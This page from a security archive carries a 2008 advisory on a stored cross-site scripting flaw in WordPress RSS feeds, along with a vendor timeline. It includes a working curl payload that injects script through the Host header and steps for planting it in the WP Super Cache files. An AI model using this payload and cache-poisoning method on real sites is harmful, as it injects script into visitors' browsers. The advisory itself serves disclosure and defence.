exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wordpressrss-xss.txt

wordpressrss-xss.txt
Posted Nov 25, 2008
Authored by Jeremias Reith

WordPress versions below 2.6.5 suffer from a stored cross site scripting vulnerability via the RSS Feed Generator.

tags | exploit, xss
SHA-256 | a96a9de2febd6493265d41274b4ca418a8c2f6e71f2af0621f2067b46cb3230c

wordpressrss-xss.txt

Change Mirror Download
===== noXSS.org Security Advisory ======

Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <jr@noxss.org>
Published: 2008/11/25
Affected: WordPress < 2.6.5


Summary
=======

WordPress prior to v2.6.3 fails to sanitize the Host header variable
correctly when generating RSS feeds and is therefore prune to XSS
attacks.

Web Sites running in a name based virtual hosting setup are not
affected as long as they are not the default virtual host.
Moreover we only found installations running on the Apache web server
to be affected.


Vulnerability Details
=====================

The function self_link() in wp-includes/feed.php is used to generate
absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:

function self_link() {
echo 'http'
. ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'
. $_SERVER['HTTP_HOST']
. wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but
WordPress replaces all $_SERVER variables with escaped ones in
wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);

In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified
array. Unfortunately this escaping method is not safe in markup
context.


PoC
====

The Apache web server only disallows '/', '\' and '..' within the host
header. The header can therefore contain markup making the following
PoC possible:

curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \
http://www.example.org/blog/feed

The given example request will return (without additional newlines):

-- snip --
...
<atom:link href="http://\">
<body onload=alert(String.fromCharCode(88,83,83))>
/blog/feed" rel="self" type="application/rss+xml" />
...
-- snip --

The embedded JavaScript will be executed in Firefox 3.0.4 due to the
triggered switch to Quirks mode.


Exploit
=======

The following exploit is a semi-stored XSS attack and has been tested
with the following setup:

- Apache 2.x with IP based virtual hosting
- Wordpress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4


WP Super Cache is a popular WordPress plugin that adds static file
caching to WordPress. It greatly increases performance and is
often used. It saves generated pages in the wp-content/cache directory
and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation
will lead to a file containing the XSS to be generated and placed
within the document root.

Request:
curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \
http://www.example.org/blog/feed

Generated file:
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even tough the feed is
XML because the file is served as text/html.

The only missing the step is the calculation cached file's MD5 sum.

The following code generates the MD5 checksum:

php -r 'echo md5("\"><body
onload=alert(String.fromCharCode(88,83,83))>".
"/blog/feed"), "\n";'

In the default setup the MD5 sum can be generated by concatenating the
contents of HTTP_HOST and REQUEST_URI resulting in
0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes
it. The default expire time is 3600 seconds.


Vendor Response
===============
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close